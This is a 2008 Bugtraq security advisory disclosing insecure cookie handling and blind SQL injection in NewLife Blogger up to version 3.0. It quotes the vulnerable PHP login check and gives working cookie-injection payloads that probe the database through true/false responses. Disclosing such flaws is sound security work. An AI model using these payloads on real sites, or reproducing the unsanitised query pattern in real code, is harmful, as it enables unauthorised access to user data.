NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugtraq-owner@xxxxxxxxxxxxxxxxx
- Subject: NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability
- From: Pepelux <pepelux@xxxxxxxxxxxx>
- Date: Mon, 13 Oct 2008 01:55:59 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:sender :to:subject:mime-version:content-type:content-transfer-encoding :content-disposition:x-google-sender-auth; bh=zE/piUspr2x0Na1DXoM7IaYAflXLEysBamsFCs/Rugs=; b=BidEDCIgeaXZdNDX7zdEw7PkXyuh5uXv35F77Ts2zs+mW2Wt4yhM4zGznz1HW1eQoo wgQqS7iq2oW4QxKM9/ckSLYovVO3K1ubp6KB+EdjygUE6Uo26FGf4tBEzx2RXQQ8Ipg9 w1NV29fKjesbvL3NCkEWPvXBmj/BRIbPxyGJk=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:sender:to:subject:mime-version:content-type :content-transfer-encoding:content-disposition:x-google-sender-auth; b=ZuOfiIAAUKTeVPwN4ck759vhMyq5ff4G1vv+vbDr3baFohwUO2Q3jHoRUciC5Y1aXI 6aCm2VaM4kHR6lT501CqSWwmLVGGXzv33Hvr8NdEgMfXhTUvgnD/AGV2Cnif5tTPqmyN q+oViAFxRoVwTodm5AQ5mgkQOs6twiAZNeBnk=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
- Sender: pepeluxx@xxxxxxxxx
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection
Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$ Program: NewLife Blogger
$ Version: <= 3.0
$ File affected: system/nlb_user.class.php
$ Download: http://sourceforge.net/projects/nlb/
Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org
Cookie format is:
nlb3=7::96e79218965eb72c92a549dd5a330112
nlb3=iduser::md5 pass
--Bug --
143. function checkLogin( ) {
144. // loing check
145. if( isset( $_COOKIE['nlb3'] ) ) {
146. $data = explode( '::', $_COOKIE['nlb3'] );
147. $id = $data[0];
148. $pass = $data[1];
149. $fromdb = $this->sql->getArray('SELECT password FROM ' .
db_users . ' WHERE user_id = ' . $id . ' LIMIT 1;');
150. if( $pass === $fromdb['password'] ) {
151. $this->setid( $id );
152. $this->isLogedIn = true;
153. } else {
154. $this->isLogedIn = false;
155. }
156. }
157. // we also check for banned users
158. $this->checkBanned();
159. }
-- Exploit --
True/false method to blind mysql injection. Examples:
javascript:document.cookie = "nlb3=7 and 1=1::96e79218965eb72c92a549dd5a330112"
Response: You appears as logged in
javascript:document.cookie = "nlb3=7 and 1=0::96e79218965eb72c92a549dd5a330112"
Response: You appears as not logged in
javascript:document.cookie = "nlb3=7 and (select
substring(version(),1,1))=4::96e79218965eb72c92a549dd5a330112
Response: You appears as logged in if MySQL version is 4
javascript:document.cookie = "nlb3=7 and (select
substring(version(),1,1))=5::96e79218965eb72c92a549dd5a330112
Response: You appears as logged in if MySQL version is 5